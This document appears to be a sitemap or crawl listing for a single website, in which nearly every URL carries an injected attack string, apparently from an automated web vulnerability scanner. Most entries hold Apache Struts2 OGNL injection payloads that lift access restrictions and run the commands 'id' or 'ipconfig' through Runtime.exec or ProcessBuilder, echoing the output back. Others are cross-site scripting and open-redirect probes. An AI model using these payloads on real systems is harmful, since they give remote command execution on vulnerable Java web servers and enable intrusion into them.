http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f?=%3c624560%20x%3d981611854%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html??debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f?=http%3a%2f%2fwww.site120.cn%2fwebscantest_alert.html 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3f=%3c624560+x%3d981611854%3e? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?=%2578%2573%2573%2574%2565%2573%2574%2562%2536%2562 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f%3f=http%3a%2f%2fwww.site120.cn%2fwebscantest_alert.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html%3f=%3c721729+x%3d929979654%3e? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html??debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?$%7b100002-1%2b'anonymous_'%2b'security_s2015_test'%7d.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html%3f=%2578%2573%2573%2574%2565%2573%2574%2562%2536%2562? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3f=%3c431768+x%3d988659748%3e? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?=fsm53413%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem48667 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html%3f=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 